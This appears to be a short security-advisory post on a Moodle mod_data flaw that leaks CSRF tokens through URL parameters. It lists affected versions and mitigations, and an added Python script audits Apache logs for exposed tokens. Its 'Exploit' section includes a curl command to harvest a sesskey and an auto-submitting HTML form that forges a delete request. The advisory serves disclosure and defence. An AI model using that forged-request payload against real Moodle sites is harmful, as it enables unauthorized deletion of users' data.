How the CVE Works:
Moodle’s `mod_data` module improperly passes CSRF tokens in GET parameters on edit/delete pages. CSRF tokens are meant to validate legitimate user actions but were exposed in URLs, making them susceptible to theft via browser history, logs, or MITM attacks. Attackers could capture these tokens and forge malicious requests, bypassing CSRF protections. Affected versions include Moodle <4.1.18, 4.3.0-beta to <4.3.12, 4.4.0-beta to <4.4.8, and 4.5.0-beta to <4.5.4.
DailyCVE Form:
Platform: Moodle
Version: <4.1.18, 4.3.0-4.3.11, 4.4.0-4.4.7, 4.5.0-4.5.3
Vulnerability: CSRF token leak
Severity: Low
Date: 2025-04-25
What Undercode Say:
Exploit:
1. Capture CSRF token from URL:
curl -s "https://target.com/mod/data/edit.php?id=123&sesskey=LEAKED_TOKEN" | grep -oP 'sesskey=\K[^"]+'
2. Forge malicious request:
<form action="https://target.com/mod/data/delete.php" method="POST">
  <input type="hidden" name="id" value="123">
  <input type="hidden" name="sesskey" value="LEAKED_TOKEN">
</form>
<script>document.forms[0].submit();</script>
Protection:
1. Upgrade to patched versions (4.1.18, 4.3.12, 4.4.8, 4.5.4).
2. Audit logs for exposed tokens:
grep "sesskey=" /var/log/apache2/access.log
3. Force POST for sensitive actions (server-side):
if ($_SERVER['REQUEST_METHOD'] !== 'POST') { die("Invalid method"); }
4. Add `.htaccess` rule to block token logging:
# [F] answers 403 Forbidden to any request whose query string contains sesskey=
RewriteCond %{QUERY_STRING} sesskey= [NC]
RewriteRule ^ - [F]
5. Monitor for suspicious activity:
tail -f /var/log/moodle/events.log | grep "csrf_failure"
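A fuller version of the log audit in step 2, as an added example that is not part of the original post: it goes beyond the `grep` by parsing Apache combined-format lines, checking both the request URL and the Referer field for `sesskey` under `/mod/data/`, and reporting a hash prefix instead of the raw token. The function names, host name and sample lines are constructed for illustration.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def token_id(token):
    """Short SHA-256 prefix, so the report never repeats the raw sesskey."""
    return hashlib.sha256(token.encode()).hexdigest()[:12]

def audit(lines, path_prefix="/mod/data/"):
    """Return (findings, shared): each exposure, and token ids seen from more than one IP."""
    findings, ips_by_token = [], defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not combined format: skip rather than guess
        # A token in a URL is logged with the request and again as a later Referer.
        for field in ("url", "referer"):
            parts = urlsplit(m[field])
            if not parts.path.startswith(path_prefix):
                continue
            for token in parse_qs(parts.query).get("sesskey", []):
                tid = token_id(token)
                ips_by_token[tid].add(m["ip"])
                findings.append((m["ip"], field, parts.path, tid))
    shared = {t: sorted(ips) for t, ips in ips_by_token.items() if len(ips) > 1}
    return findings, shared

# Constructed sample lines (documentation IP ranges, made-up token and host).
SAMPLE = [
    '203.0.113.10 - - [25/Apr/2025:10:00:01 +0000] "GET /mod/data/edit.php?id=123&sesskey=AAAAtoken1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Apr/2025:10:00:02 +0000] "GET /theme/styles.php HTTP/1.1" 200 312 "https://moodle.example/mod/data/edit.php?id=123&sesskey=AAAAtoken1" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Apr/2025:10:07:30 +0000] "GET /mod/data/delete.php?id=123&sesskey=AAAAtoken1 HTTP/1.1" 200 900 "-" "curl/8.5.0"',
    '203.0.113.10 - - [25/Apr/2025:10:09:00 +0000] "POST /mod/data/edit.php HTTP/1.1" 303 0 "https://moodle.example/mod/data/edit.php?id=123" "Mozilla/5.0"',
]

if __name__ == "__main__":
    findings, shared = audit(SAMPLE)
    for ip, field, path, tid in findings:
        print(f"{ip} exposed token {tid} in {field}: {path}")
    for tid, ips in shared.items():
        print(f"token {tid} seen from several clients: {', '.join(ips)}")
```

A token id seen from more than one address is a lead to check against session records, not proof of misuse, since clients change addresses.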
Sources:
Reported By: github.com